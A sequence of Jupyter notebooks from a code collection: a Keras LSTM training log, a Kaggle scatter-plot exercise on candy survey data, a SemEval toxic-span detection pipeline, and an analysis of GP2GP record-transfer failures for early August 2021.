Trainable params: 1,561,801
Non-trainable params: 0
_________________________________________________________________
None
Train on 70000 samples, validate on 3000 samples
Epoch 1/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0472 - mean_squared_error: 0.0472 - mean_absolute_error: 0.1838 - coeff_determination_metric: 0.1582
Epoch 00001: val_loss improved from inf to 0.04676, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.01-0.0468.hdf5
70000/70000 [==============================] - 914s 13ms/step - loss: 0.0472 - mean_squared_error: 0.0472 - mean_absolute_error: 0.1838 - coeff_determination_metric: 0.1582 - val_loss: 0.0468 - val_mean_squared_error: 0.0468 - val_mean_absolute_error: 0.1789 - val_coeff_determination_metric: 0.1707
Epoch 2/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0476 - mean_squared_error: 0.0476 - mean_absolute_error: 0.1873 - coeff_determination_metric: 0.1515
Epoch 00002: val_loss improved from 0.04676 to 0.03574, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.02-0.0357.hdf5
70000/70000 [==============================] - 941s 13ms/step - loss: 0.0476 - mean_squared_error: 0.0476 - mean_absolute_error: 0.1873 - coeff_determination_metric: 0.1520 - val_loss: 0.0357 - val_mean_squared_error: 0.0357 - val_mean_absolute_error: 0.1528 - val_coeff_determination_metric: 0.3671
Epoch 3/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0341 - mean_squared_error: 0.0341 - mean_absolute_error: 0.1496 - coeff_determination_metric: 0.3920
Epoch 00003: val_loss improved from 0.03574 to 0.02953, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.03-0.0295.hdf5
70000/70000 [==============================] - 932s 13ms/step - loss: 0.0340 - mean_squared_error: 0.0340 - mean_absolute_error: 0.1496 - coeff_determination_metric: 0.3922 - val_loss: 0.0295 - val_mean_squared_error: 0.0295 - val_mean_absolute_error: 0.1352 - val_coeff_determination_metric: 0.4773
Epoch 4/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0283 - mean_squared_error: 0.0283 - mean_absolute_error: 0.1336 - coeff_determination_metric: 0.4944
Epoch 00004: val_loss improved from 0.02953 to 0.02749, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.04-0.0275.hdf5
70000/70000 [==============================] - 905s 13ms/step - loss: 0.0283 - mean_squared_error: 0.0283 - mean_absolute_error: 0.1336 - coeff_determination_metric: 0.4944 - val_loss: 0.0275 - val_mean_squared_error: 0.0275 - val_mean_absolute_error: 0.1316 - val_coeff_determination_metric: 0.5129
Epoch 5/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0235 - mean_squared_error: 0.0235 - mean_absolute_error: 0.1190 - coeff_determination_metric: 0.5792
Epoch 00005: val_loss improved from 0.02749 to 0.02519, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.05-0.0252.hdf5
70000/70000 [==============================] - 916s 13ms/step - loss: 0.0235 - mean_squared_error: 0.0235 - mean_absolute_error: 0.1190 - coeff_determination_metric: 0.5791 - val_loss: 0.0252 - val_mean_squared_error: 0.0252 - val_mean_absolute_error: 0.1246 - val_coeff_determination_metric: 0.5536
Epoch 6/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0203 - mean_squared_error: 0.0203 - mean_absolute_error: 0.1093 - coeff_determination_metric: 0.6369
Epoch 00006: val_loss improved from 0.02519 to 0.02454, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.06-0.0245.hdf5
70000/70000 [==============================] - 899s 13ms/step - loss: 0.0203 - mean_squared_error: 0.0203 - mean_absolute_error: 0.1093 - coeff_determination_metric: 0.6368 - val_loss: 0.0245 - val_mean_squared_error: 0.0245 - val_mean_absolute_error: 0.1194 - val_coeff_determination_metric: 0.5648
Epoch 7/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0181 - mean_squared_error: 0.0181 - mean_absolute_error: 0.1023 - coeff_determination_metric: 0.6764
Epoch 00007: val_loss improved from 0.02454 to 0.02454, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.07-0.0245.hdf5
70000/70000 [==============================] - 901s 13ms/step - loss: 0.0181 - mean_squared_error: 0.0181 - mean_absolute_error: 0.1023 - coeff_determination_metric: 0.6764 - val_loss: 0.0245 - val_mean_squared_error: 0.0245 - val_mean_absolute_error: 0.1188 - val_coeff_determination_metric: 0.5651
Epoch 8/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0164 - mean_squared_error: 0.0164 - mean_absolute_error: 0.0967 - coeff_determination_metric: 0.7070
Epoch 00008: val_loss did not improve
70000/70000 [==============================] - 943s 13ms/step - loss: 0.0164 - mean_squared_error: 0.0164 - mean_absolute_error: 0.0967 - coeff_determination_metric: 0.7070 - val_loss: 0.0247 - val_mean_squared_error: 0.0247 - val_mean_absolute_error: 0.1188 - val_coeff_determination_metric: 0.5615
Epoch 9/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0150 - mean_squared_error: 0.0150 - mean_absolute_error: 0.0918 - coeff_determination_metric: 0.7324
Epoch 00009: val_loss did not improve
70000/70000 [==============================] - 913s 13ms/step - loss: 0.0150 - mean_squared_error: 0.0150 - mean_absolute_error: 0.0918 - coeff_determination_metric: 0.7323 - val_loss: 0.0252 - val_mean_squared_error: 0.0252 - val_mean_absolute_error: 0.1180 - val_coeff_determination_metric: 0.5536
Epoch 10/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0135 - mean_squared_error: 0.0135 - mean_absolute_error: 0.0867 - coeff_determination_metric: 0.7583
Epoch 00010: val_loss did not improve
70000/70000 [==============================] - 880s 13ms/step - loss: 0.0135 - mean_squared_error: 0.0135 - mean_absolute_error: 0.0867 - coeff_determination_metric: 0.7583 - val_loss: 0.0247 - val_mean_squared_error: 0.0247 - val_mean_absolute_error: 0.1158 - val_coeff_determination_metric: 0.5615
Epoch 11/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0123 - mean_squared_error: 0.0123 - mean_absolute_error: 0.0822 - coeff_determination_metric: 0.7805
Epoch 00011: val_loss did not improve
70000/70000 [==============================] - 835s 12ms/step - loss: 0.0123 - mean_squared_error: 0.0123 - mean_absolute_error: 0.0822 - coeff_determination_metric: 0.7806 - val_loss: 0.0264 - val_mean_squared_error: 0.0264 - val_mean_absolute_error: 0.1178 - val_coeff_determination_metric: 0.5307
Epoch 12/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0110 - mean_squared_error: 0.0110 - mean_absolute_error: 0.0776 - coeff_determination_metric: 0.8027
Epoch 00012: val_loss did not improve
70000/70000 [==============================] - 836s 12ms/step - loss: 0.0110 - mean_squared_error: 0.0110 - mean_absolute_error: 0.0776 - coeff_determination_metric: 0.8027 - val_loss: 0.0261 - val_mean_squared_error: 0.0261 - val_mean_absolute_error: 0.1157 - val_coeff_determination_metric: 0.5364
Epoch 13/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0101 - mean_squared_error: 0.0101 - mean_absolute_error: 0.0739 - coeff_determination_metric: 0.8201
Epoch 00013: val_loss did not improve
70000/70000 [==============================] - 844s 12ms/step - loss: 0.0101 - mean_squared_error: 0.0101 - mean_absolute_error: 0.0739 - coeff_determination_metric: 0.8201 - val_loss: 0.0265 - val_mean_squared_error: 0.0265 - val_mean_absolute_error: 0.1161 - val_coeff_determination_metric: 0.5288
Epoch 14/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0092 - mean_squared_error: 0.0092 - mean_absolute_error: 0.0704 - coeff_determination_metric: 0.8351
Epoch 00014: val_loss did not improve
70000/70000 [==============================] - 896s 13ms/step - loss: 0.0092 - mean_squared_error: 0.0092 - mean_absolute_error: 0.0704 - coeff_determination_metric: 0.8349 - val_loss: 0.0282 - val_mean_squared_error: 0.0282 - val_mean_absolute_error: 0.1177 - val_coeff_determination_metric: 0.4998
Epoch 15/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0085 - mean_squared_error: 0.0085 - mean_absolute_error: 0.0673 - coeff_determination_metric: 0.8481
Epoch 00015: val_loss did not improve
70000/70000 [==============================] - 893s 13ms/step - loss: 0.0085 - mean_squared_error: 0.0085 - mean_absolute_error: 0.0674 - coeff_determination_metric: 0.8481 - val_loss: 0.0273 - val_mean_squared_error: 0.0273 - val_mean_absolute_error: 0.1160 - val_coeff_determination_metric: 0.5167
|
Data Visualisation/exercise-scatter-plots.ipynb | ###Markdown
**This notebook is an exercise in the [Data Visualization](https://www.kaggle.com/learn/data-visualization) course. You can reference the tutorial at [this link](https://www.kaggle.com/alexisbcook/scatter-plots).**--- In this exercise, you will use your new knowledge to propose a solution to a real-world scenario. To succeed, you will need to import data into Python, answer questions using the data, and generate **scatter plots** to understand patterns in the data. ScenarioYou work for a major candy producer, and your goal is to write a report that your company can use to guide the design of its next product. Soon after starting your research, you stumble across this [very interesting dataset](https://fivethirtyeight.com/features/the-ultimate-halloween-candy-power-ranking/) containing results from a fun survey to crowdsource favorite candies. SetupRun the next cell to import and configure the Python libraries that you need to complete the exercise.
###Code
import pandas as pd
pd.plotting.register_matplotlib_converters()
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
print("Setup Complete")
###Output
_____no_output_____
###Markdown
The questions below will give you feedback on your work. Run the following cell to set up our feedback system.
###Code
# Set up code checking
import os
if not os.path.exists("../input/candy.csv"):
os.symlink("../input/data-for-datavis/candy.csv", "../input/candy.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.data_viz_to_coder.ex4 import *
print("Setup Complete")
###Output
_____no_output_____
###Markdown
Step 1: Load the DataRead the candy data file into `candy_data`. Use the `"id"` column to label the rows.
###Code
# Path of the file to read
candy_filepath = "../input/candy.csv"
# Fill in the line below to read the file into a variable candy_data
candy_data = pd.read_csv(candy_filepath, index_col="id")
# Run the line below with no changes to check that you've loaded the data correctly
step_1.check()
# Lines below will give you a hint or solution code
step_1.hint()
#step_1.solution()
###Output
_____no_output_____
###Markdown
Step 2: Review the dataUse a Python command to print the first five rows of the data.
###Code
# Print the first five rows of the data
candy_data.head() # Your code here
###Output
_____no_output_____
###Markdown
The dataset contains 83 rows, where each corresponds to a different candy bar. There are 13 columns:- `'competitorname'` contains the name of the candy bar. - the next **9** columns (from `'chocolate'` to `'pluribus'`) describe the candy. For instance, rows with chocolate candies have `"Yes"` in the `'chocolate'` column (and candies without chocolate have `"No"` in the same column).- `'sugarpercent'` provides some indication of the amount of sugar, where higher values signify higher sugar content.- `'pricepercent'` shows the price per unit, relative to the other candies in the dataset.- `'winpercent'` is calculated from the survey results; higher values indicate that the candy was more popular with survey respondents.Use the first five rows of the data to answer the questions below.
###Code
# Fill in the line below: Which candy was more popular with survey respondents:
# '3 Musketeers' or 'Almond Joy'? (Please enclose your answer in single quotes.)
more_popular = '3 Musketeers'
# Fill in the line below: Which candy has higher sugar content: 'Air Heads'
# or 'Baby Ruth'? (Please enclose your answer in single quotes.)
more_sugar = 'Air Heads'
# Check your answers
step_2.check()
# Lines below will give you a hint or solution code
#step_2.hint()
#step_2.solution()
###Output
_____no_output_____
###Markdown
Step 3: The role of sugarDo people tend to prefer candies with higher sugar content? Part ACreate a scatter plot that shows the relationship between `'sugarpercent'` (on the horizontal x-axis) and `'winpercent'` (on the vertical y-axis). _Don't add a regression line just yet -- you'll do that in the next step!_
###Code
# Scatter plot showing the relationship between 'sugarpercent' and 'winpercent'
sns.scatterplot(candy_data['sugarpercent'],candy_data['winpercent'])# Your code here
# Check your answer
step_3.a.check()
# Lines below will give you a hint or solution code
#step_3.a.hint()
#step_3.a.solution_plot()
###Output
_____no_output_____
###Markdown
Part BDoes the scatter plot show a **strong** correlation between the two variables? If so, are candies with more sugar relatively more or less popular with the survey respondents?
###Code
#step_3.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_3.b.solution()
###Output
_____no_output_____
###Markdown
Step 4: Take a closer look Part ACreate the same scatter plot you created in **Step 3**, but now with a regression line!
###Code
# Scatter plot w/ regression line showing the relationship between 'sugarpercent' and 'winpercent'
sns.regplot(candy_data['sugarpercent'],candy_data['winpercent']) # Your code here
# Check your answer
step_4.a.check()
# Lines below will give you a hint or solution code
#step_4.a.hint()
#step_4.a.solution_plot()
###Output
_____no_output_____
###Markdown
Part BAccording to the plot above, is there a **slight** correlation between `'winpercent'` and `'sugarpercent'`? What does this tell you about the candy that people tend to prefer?
###Code
#step_4.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_4.b.solution()
###Output
_____no_output_____
###Markdown
Step 5: Chocolate!In the code cell below, create a scatter plot to show the relationship between `'pricepercent'` (on the horizontal x-axis) and `'winpercent'` (on the vertical y-axis). Use the `'chocolate'` column to color-code the points. _Don't add any regression lines just yet -- you'll do that in the next step!_
###Code
# Scatter plot showing the relationship between 'pricepercent', 'winpercent', and 'chocolate'
sns.scatterplot(candy_data['pricepercent'],candy_data['winpercent'],hue=candy_data['chocolate']) # Your code here
# Check your answer
step_5.check()
# Lines below will give you a hint or solution code
#step_5.hint()
#step_5.solution_plot()
###Output
_____no_output_____
###Markdown
Can you see any interesting patterns in the scatter plot? We'll investigate this plot further by adding regression lines in the next step! Step 6: Investigate chocolate Part ACreate the same scatter plot you created in **Step 5**, but now with two regression lines, corresponding to (1) chocolate candies and (2) candies without chocolate.
###Code
# Color-coded scatter plot w/ regression lines
sns.lmplot(x='pricepercent',y='winpercent',hue='chocolate',data=candy_data) # Your code here
# Check your answer
step_6.a.check()
# Lines below will give you a hint or solution code
step_6.a.hint()
step_6.a.solution_plot()
###Output
_____no_output_____
###Markdown
Part BUsing the regression lines, what conclusions can you draw about the effects of chocolate and price on candy popularity?
###Code
#step_6.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_6.b.solution()
###Output
_____no_output_____
###Markdown
Step 7: Everybody loves chocolate. Part ACreate a categorical scatter plot to highlight the relationship between `'chocolate'` and `'winpercent'`. Put `'chocolate'` on the (horizontal) x-axis, and `'winpercent'` on the (vertical) y-axis.
###Code
# Scatter plot showing the relationship between 'chocolate' and 'winpercent'
sns.swarmplot(x='chocolate',y='winpercent',data=candy_data) # Your code here
# Check your answer
step_7.a.check()
# Lines below will give you a hint or solution code
#step_7.a.hint()
#step_7.a.solution_plot()
###Output
_____no_output_____
###Markdown
Part BYou decide to dedicate a section of your report to the fact that chocolate candies tend to be more popular than candies without chocolate. Which plot is more appropriate to tell this story: the plot from **Step 6**, or the plot from **Step 7**?
###Code
#step_7.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_7.b.solution()
###Output
_____no_output_____ |
semeval_toxic_spans.ipynb | ###Markdown
###Code
import pandas as pd
import numpy as np
import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
nltk.download('punkt')
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
wordnet_lemmatizer = WordNetLemmatizer()
!pip install sentence_transformers
from sentence_transformers import SentenceTransformer
import pickle
from gensim.models.keyedvectors import KeyedVectors
from tqdm import tqdm
!git clone https://github.com/ipavlopoulos/toxic_spans.git
from toxic_spans.evaluation.semeval2021 import f1
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Выделяем токены, для токенов размечаем, токсичные они или нет
###Code
df = pd.read_csv('/content/tsd_trial.csv')
print(df.shape)
df.head()
texts = df['text']
spans = df['spans']
for i in range(df.shape[0]):
spans[i] = str(spans[i])
if spans[i]!='[]':
spans[i] = spans[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
spans[i] = spans[i].split(', ')
spans[i] = [int(sp) for sp in spans[i]]
else:
spans[i] = []
print(spans[0])
print(type(spans[0]))
values = []
values.append(['spans', 'text', 'tokens', 'is_toxic'])
for i, text in enumerate(texts):
if i%1000 == 0:
print(i)
binstr = []
tokens = []
tmp=''
for j in range(len(text)):
if j==0:
tmp+=text[j]
else:
if j in spans[i] and j-1 not in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(0)
tmp = text[j]
elif j not in spans[i] and j-1 in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(1)
tmp = text[j]
else:
tmp+=text[j]
if tmp!='':
if len(text)-1 in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(1)
else:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(0)
#print(text)
#print(spans[i])
#print(binstr)
#print(tokens)
#print('******')
values.append([spans[i], text, tokens, binstr])
pd.DataFrame(values).to_csv('tsd_trial_tokens.csv')
###Output
_____no_output_____
###Markdown
Делаем обучающую выборку для токенов
###Code
df = pd.read_csv('/content/tsd_trial_tokens.csv', index_col=0, header=1)
print(df.shape)
df.head()
spans = df['spans']
texts = df['text']
tokens = df['tokens']
is_toxic = df['is_toxic']
for i in range(1, df.shape[0]):
spans[i] = str(spans[i])
if spans[i]!='[]':
spans[i] = spans[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
spans[i] = spans[i].split(', ')
spans[i] = [int(sp) for sp in spans[i]]
else:
spans[i] = []
for i in range(1, df.shape[0]):
tokens[i] = str(tokens[i])
if tokens[i]!='[]':
tokens[i] = tokens[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
tokens[i] = tokens[i].split(', ')
#tokens[i] = [int(sp) for sp in tokens[i]]
else:
tokens[i] = []
for i in range(1, df.shape[0]):
is_toxic[i] = str(is_toxic[i])
if is_toxic[i]!='[]':
is_toxic[i] = is_toxic[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
is_toxic[i] = is_toxic[i].split(', ')
is_toxic[i] = [int(sp) for sp in is_toxic[i]]
else:
is_toxic[i] = []
train_sample = []
#train_sample.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
num = 0
for i in range(1, spans.shape[0]):
if i%1000==0:
print(i)
for j, token in enumerate(tokens[i]):
if len(token)>=3:
train_sample.append([is_toxic[i][j], token, wordnet_lemmatizer.lemmatize(token), i, texts[i]])
train_sample = pd.DataFrame(train_sample).sample(frac=1).values
train_sample_short = []
train_sample_short.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
for tr in train_sample:
if tr[0]==1:
train_sample_short.append(tr)
else:
if num<=20856:
train_sample_short.append(tr)
num+=1
pd.DataFrame(train_sample_short).to_csv('tsd_train_fnn.csv')
print(len(train_sample_short))
train_sample = []
train_sample.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
num = 0
for i in range(1, spans.shape[0]):
if i%1000==0:
print(i)
for j, token in enumerate(tokens[i]):
if len(token)>=3:
train_sample.append([is_toxic[i][j], token, wordnet_lemmatizer.lemmatize(token), i, texts[i]])
pd.DataFrame(train_sample).to_csv('tsd_trial_fnn.csv')
print(len(train_sample))
###Output
_____no_output_____
###Markdown
Получаем эмбеддинги BERT для текстов
###Code
df = pd.read_csv('/content/tsd_trial.csv')
print(df.shape)
df.head()
model = SentenceTransformer('distilbert-base-nli-mean-tokens')
sentences = df['text'].values
sentence_embeddings = model.encode(sentences)
print(sentences[0])
print(len(sentence_embeddings[0]))
print(sentence_embeddings[0])
with open('/content/drive/My Drive/semeval21/sentence_embs_trial.pickle', 'wb') as f:
pickle.dump(sentence_embeddings, f)
###Output
_____no_output_____
###Markdown
Получаем эмбеддинги для слов
###Code
df = pd.read_csv('/content/tsd_train_fnn.csv', index_col=0, header=1)
print(df.shape)
df.head()
words = set()
for el in df['token_lemmatized'].values:
words.add(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')))
print(len(words))
df = pd.read_csv('/content/tsd_trial_fnn.csv', index_col=0, header=1)
print(df.shape)
df.head()
for el in df['token_lemmatized'].values:
words.add(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')))
print(len(words))
fname = '/content/drive/My Drive/english_w2v/model.bin'
w2v = KeyedVectors.load_word2vec_format(fname, binary=True)
words = list(words)
print(words[:5])
embs = []
new_words = []
for w in words:
try:
embs.append(w2v[w])
new_words.append(w)
except:
pass
print(len(embs))
with open('/content/drive/My Drive/semeval21/word2vec_words.pickle', 'wb') as f:
pickle.dump(new_words, f)
with open('/content/drive/My Drive/semeval21/word2vec_embs.pickle', 'wb') as f:
pickle.dump(embs, f)
###Output
_____no_output_____
###Markdown
Делаем обучающую выборку: эмбеддинг слова + эмбеддинг предложения
###Code
df = pd.read_csv('/content/tsd_trial_fnn.csv', index_col=0, header =1)
df.head()
list_words =[]
for el in df['token_lemmatized'].values:
list_words.append(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')) )
print(len(list_words))
with open('/content/drive/My Drive/semeval21/word2vec_words.pickle', 'rb') as f:
words = pickle.load(f)
with open('/content/drive/My Drive/semeval21/word2vec_embs.pickle', 'rb') as f:
embs = pickle.load(f)
with open('/content/drive/My Drive/semeval21/sentence_embs_trial.pickle', 'rb') as f:
sentence_embs = pickle.load(f)
train_data = []
train_labels = []
texts_words = []
words_set = set(words)
for i,el in enumerate(df.values):
if list_words[i] in words_set:
elem = np.concatenate((embs[words.index(list_words[i])], sentence_embs[el[3]-1]))
train_labels.append(el[0])
train_data.append(elem)
texts_words.append([el[1],el[4]])
print(len(train_data))
print(len(train_labels))
print(train_data[0])
print(train_labels[0])
with open('/content/drive/My Drive/semeval21/test_data.pickle', 'wb') as f:
pickle.dump(train_data, f)
with open('/content/drive/My Drive/semeval21/test_labels.pickle', 'wb') as f:
pickle.dump(train_labels, f)
with open('/content/drive/My Drive/semeval21/train_key.pickle', 'wb') as f:
pickle.dump(texts_words, f)
###Output
_____no_output_____
###Markdown
Классификатор
###Code
import keras
from keras import Sequential
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.layers import Input, Embedding, Activation, Flatten, Dense, concatenate
from keras.models import Model
with open('/content/drive/My Drive/semeval21/test_data.pickle', 'rb') as f:
test_data = pickle.load(f)
with open('/content/drive/My Drive/semeval21/test_labels.pickle', 'rb') as f:
test_labels = pickle.load(f)
with open('/content/drive/My Drive/semeval21/train_data.pickle', 'rb') as f:
train_data = pickle.load(f)
with open('/content/drive/My Drive/semeval21/train_labels.pickle', 'rb') as f:
train_labels = pickle.load(f)
print(len(train_data))
print(len(train_labels))
print(len(test_data))
print(len(test_labels))
#labels to categorical
train_labels = keras.utils.to_categorical(np.array(train_labels),2)
test_labels = keras.utils.to_categorical(np.array(test_labels),2)
inputs=Input(shape=(len(train_data[0]),), name='input')
x=Dense(1024, activation='tanh', name='fully_connected_1024_tanh')(inputs)
#x=Dense(1024, activation='tanh', name='fully_connected_32')(x)
predictions=Dense(2, activation='softmax', name='output_softmax')(x)
model=Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
from sklearn.metrics import accuracy_score, f1_score, recall_score, precision_score
history = model.fit(np.array(train_data), train_labels, epochs=1, verbose=2,\
validation_data=(np.array(test_data), test_labels))
predict = np.argmax(model.predict(np.array(test_data)), axis=1)
answer = np.argmax(test_labels, axis=1)
f1=f1_score(predict, answer)*100
prec=precision_score(predict, answer)*100
recall=recall_score(predict, answer)*100
accuracy=accuracy_score(predict, answer)*100
print(i)
print('Готово!')
print('f1 = {}, accuracy = {}, precision = {}, recall = {}'.format(f1,accuracy,prec,recall))
with open('/content/drive/My Drive/semeval21/test_key.pickle', 'rb') as f:
test_key = pickle.load(f)
print(test_key[0])
df = pd.read_csv('/content/tsd_trial.csv')
df.head()
final_spans = []
for text in df['text'].values:
spans = []
for i, elem in enumerate(test_key):
if elem[1]==text and predict[i]==1:
pos = elem[1].find(elem[0])
if pos>=0:
for j in range(pos,pos+len(elem[0])):
spans.append(j)
final_spans.append(spans)
print(final_spans[:20])
df = pd.read_csv('/content/tsd_trial.csv')
from ast import literal_eval
df.spans = df.spans.apply(literal_eval)
df['predictions'] = pd.Series(final_spans)
#df["f1_scores"] = df.apply(lambda row: f1(row.predictions, row.spans), axis=1)
df.head()
df.to_csv('/content/drive/My Drive/semeval21/res_4929_w2v_dist.csv')
f1_scores = []
for i in range(690):
f1_scores.append(f1(df['spans'][i],df['predictions'][i]))
np.mean(np.array(f1_scores))
###Output
_____no_output_____ |
notebooks/63-PRMT-2324--high-level-table-with-for-2-weeks-august.ipynb | ###Markdown
PRMT-2324 Run top level table for first 2 weeks of August 2021 ContextIn our July data we saw a significant increase in GP2GP failures. We want to understand if these were blips, perhaps caused by something that happening during July, or whether these failures are continuing. We don’t want to wait until we have all August data to identify this as we are starting conversations with suppliers now.
###Code
import pandas as pd
import numpy as np
from datetime import datetime
transfer_file_location = "s3://prm-gp2gp-notebook-data-prod/PRMT-2324-2-weeks-august-data/transfers/v4/2021/8/transfers.parquet"
transfers_raw = pd.read_parquet(transfer_file_location)
transfers_raw.head()
# filter data to just include the first 2 weeks (15 days) of august
date_filter_bool = transfers_raw["date_requested"] < datetime(2021, 8, 16)
transfers_half_august = transfers_raw[date_filter_bool]
# Supplier data was only available from Feb/Mar 2021. Sending and requesting supplier values for all transfers before that are empty
# Dropping these columns to merge supplier data from ASID lookup files
transfers_half_august = transfers_half_august.drop(["sending_supplier", "requesting_supplier"], axis=1)
transfers = transfers_half_august.copy()
# Supplier name mapping
supplier_renaming = {
"EGTON MEDICAL INFORMATION SYSTEMS LTD (EMIS)":"EMIS",
"IN PRACTICE SYSTEMS LTD":"Vision",
"MICROTEST LTD":"Microtest",
"THE PHOENIX PARTNERSHIP":"TPP",
None: "Unknown"
}
# Generate ASID lookup that contains all the most recent entry for all ASIDs encountered
asid_file_location = "s3://prm-gp2gp-asid-lookup-preprod/2021/6/asidLookup.csv.gz"
asid_lookup = pd.read_csv(asid_file_location)
asid_lookup = asid_lookup.drop_duplicates().groupby("ASID").last().reset_index()
lookup = asid_lookup[["ASID", "MName"]]
transfers = transfers.merge(lookup, left_on='requesting_practice_asid',right_on='ASID',how='left')
transfers = transfers.rename({'MName': 'requesting_supplier', 'ASID': 'requesting_supplier_asid'}, axis=1)
transfers = transfers.merge(lookup, left_on='sending_practice_asid',right_on='ASID',how='left')
transfers = transfers.rename({'MName': 'sending_supplier', 'ASID': 'sending_supplier_asid'}, axis=1)
transfers["sending_supplier"] = transfers["sending_supplier"].replace(supplier_renaming.keys(), supplier_renaming.values())
transfers["requesting_supplier"] = transfers["requesting_supplier"].replace(supplier_renaming.keys(), supplier_renaming.values())
# Making the status to be more human readable here
transfers["status"] = transfers["status"].str.replace("_", " ").str.title()
import paths
import data
error_code_lookup_file = pd.read_csv(data.gp2gp_response_codes.path)
outcome_counts = transfers.fillna("N/A").groupby(by=["status", "failure_reason"]).agg({"conversation_id": "count"})
outcome_counts = outcome_counts.rename({"conversation_id": "Number of transfers", "failure_reason": "Failure Reason"}, axis=1)
outcome_counts["% of transfers"] = (outcome_counts["Number of transfers"] / outcome_counts["Number of transfers"].sum()).multiply(100)
outcome_counts.round(2)
transfers['month']=transfers['date_requested'].dt.to_period('M')
def convert_error_list_to_tuple(error_code_list, error_code_type):
return [(error_code_type, error_code) for error_code in set(error_code_list) if not np.isnan(error_code)]
def combine_error_codes(row):
sender_list = convert_error_list_to_tuple(row["sender_error_codes"], "Sender")
intermediate_list = convert_error_list_to_tuple(row["intermediate_error_codes"], "COPC")
final_list = convert_error_list_to_tuple(row["final_error_codes"], "Final")
full_error_code_list = sender_list + intermediate_list + final_list
if len(full_error_code_list) == 0:
return [("No Error Code", "No Error")]
else:
return full_error_code_list
transfers["all_error_codes"] = transfers.apply(combine_error_codes, axis=1)
def generate_high_level_table(transfers_sample):
# Break up lines by error code
transfers_split_by_error_code=transfers_sample.explode("all_error_codes")
# Create High level table
high_level_table=transfers_split_by_error_code.fillna("N/A").groupby(["requesting_supplier","sending_supplier","status","failure_reason","all_error_codes"]).agg({'conversation_id':'count'})
high_level_table=high_level_table.rename({'conversation_id':'Number of Transfers'},axis=1).reset_index()
# Count % of transfers
total_number_transfers = transfers_sample.shape[0]
high_level_table['% of Transfers']=(high_level_table['Number of Transfers']/total_number_transfers).multiply(100)
# Count by supplier pathway
supplier_pathway_counts = transfers_sample.fillna("Unknown").groupby(by=["sending_supplier", "requesting_supplier"]).agg({"conversation_id": "count"})['conversation_id']
high_level_table['% Supplier Pathway Transfers']=high_level_table.apply(lambda row: row['Number of Transfers']/supplier_pathway_counts.loc[(row['sending_supplier'],row['requesting_supplier'])],axis=1).multiply(100)
# Add in Paper Fallback columns
total_fallback = transfers_sample["failure_reason"].dropna().shape[0]
fallback_bool=high_level_table['status']!='Integrated On Time'
high_level_table.loc[fallback_bool,'% Paper Fallback']=(high_level_table['Number of Transfers']/total_fallback).multiply(100)
# % of error codes column
total_number_of_error_codes=transfers_split_by_error_code['all_error_codes'].value_counts().drop(('No Error Code','No Error')).sum()
error_code_bool=high_level_table['all_error_codes']!=('No Error Code', 'No Error')
high_level_table.loc[error_code_bool,'% of error codes']=(high_level_table['Number of Transfers']/total_number_of_error_codes).multiply(100)
# Adding columns to describe errors
high_level_table['error_type']=high_level_table['all_error_codes'].apply(lambda error_tuple: error_tuple[0])
high_level_table['error_code']=high_level_table['all_error_codes'].apply(lambda error_tuple: error_tuple[1])
high_level_table=high_level_table.merge(error_code_lookup_file[['ErrorCode','ResponseText']],left_on='error_code',right_on='ErrorCode',how='left')
# Select and re-order table
grouping_columns_order=['requesting_supplier','sending_supplier','status','failure_reason','error_type','ResponseText','error_code']
counting_columns_order=['Number of Transfers','% of Transfers','% Supplier Pathway Transfers','% Paper Fallback','% of error codes']
high_level_table=high_level_table[grouping_columns_order+counting_columns_order].sort_values(by='Number of Transfers',ascending=False)
return high_level_table
